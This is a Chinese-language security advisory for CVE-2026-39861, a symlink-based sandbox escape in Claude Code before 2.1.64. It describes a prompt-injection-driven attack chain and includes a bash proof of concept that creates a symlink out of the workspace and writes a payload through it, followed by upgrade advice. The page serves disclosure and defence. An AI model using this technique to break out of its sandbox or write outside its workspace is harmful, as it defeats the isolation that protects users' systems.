CVE-2026-39861 CVSS 10.0 严重

CVE-2026-39861 Claude Code沙箱逃逸漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39861

漏洞类型

沙箱逃逸

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Claude Code

漏洞概述

Claude Code 2.1.64 之前的版本存在严重的沙箱逃逸漏洞。沙箱进程未被阻止创建指向工作区外部的符号链接。当未沙箱化的主进程随后写入该符号链接内的路径时，会跟随链接写入外部位置，无需用户确认。攻击者结合提示词注入可利用此漏洞在沙箱外执行任意代码。

技术细节

该漏洞的核心在于 Claude Code 的沙箱机制未能有效隔离符号链接操作。沙箱内的进程被允许创建指向工作区外部任意位置的符号链接。当 Claude Code 的主进程（运行在非沙箱环境）尝试写入该符号链接下的文件路径时，它会跟随符号链接并将数据实际写入到沙箱外的目标位置。这一过程绕过了沙箱的安全限制，且不会向用户请求确认。成功利用该漏洞通常需要结合提示词攻击，即攻击者诱导 AI 将不受信任的内容注入上下文窗口，从而在沙箱内执行创建符号链接的命令。通过这种“沙箱内创建链接，沙箱外写入数据”的组合攻击方式，攻击者可以突破工作区边界，实现任意文件写入，最终导致沙箱逃逸并在宿主机上执行任意代码，造成严重的安全风险。

攻击链分析

STEP 1

1. 初始访问

攻击者通过提示词注入，将不受信任的内容输入到 Claude Code 的上下文窗口中，试图在沙箱内执行命令。

STEP 2

2. 沙箱内操作

利用注入的命令，沙箱进程在工作区内创建一个符号链接，该链接指向工作区外的任意位置（如 /tmp 或用户主目录）。

STEP 3

3. 诱导写入

攻击者诱导未沙箱化的 Claude Code 主进程向该符号链接路径写入文件（例如生成代码并保存）。

STEP 4

4. 沙箱逃逸

主进程跟随符号链接，将文件实际写入到了工作区外部，从而绕过了沙箱限制，可能导致在宿主机上执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-39861: Claude Code Sandbox Escape via Symlink
# This script demonstrates the concept of the attack.

# Step 1: Attacker triggers prompt injection to execute inside the sandbox
# The goal is to create a symlink pointing outside the workspace
SANDBOX_PATH="./workspace/malicious_link"
TARGET_PATH="/tmp/pwned"

echo "[+] Step 1: Creating symlink inside sandbox..."
# Command executed within the sandboxed process via prompt injection
ln -s $TARGET_PATH $SANDBOX_PATH

# Step 2: Attacker tricks Claude Code (unsandboxed) into writing to the symlink
# For example, asking Claude to save a generated file to './workspace/malicious_link/exploit.sh'
OUTPUT_FILE="exploit.sh"
PAYLOAD="#!/bin/bash\necho 'System pwned via CVE-2026-39861'"

echo "[+] Step 2: Simulating unsandboxed write..."
# The unsandboxed process writes to $SANDBOX_PATH/$OUTPUT_FILE
# OS resolves this to $TARGET_PATH/$OUTPUT_FILE
echo "$PAYLOAD" > "$SANDBOX_PATH/$OUTPUT_FILE"

echo "[+] Checking if file exists outside workspace..."
if [ -f "$TARGET_PATH/$OUTPUT_FILE" ]; then
    echo "[!] Exploit successful! File written to $TARGET_PATH/$OUTPUT_FILE"
    cat "$TARGET_PATH/$OUTPUT_FILE"
else
    echo "[-] Exploit failed."
fi

影响范围

Claude Code < 2.1.64

防御指南

临时缓解措施

建议用户立即启用自动更新功能以获取安全补丁。对于手动更新的用户，应尽快升级至 2.1.64 或更高版本。在使用 Claude Code 处理不受信任的代码或提示词时，应保持警惕，避免在包含敏感数据的环境中执行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表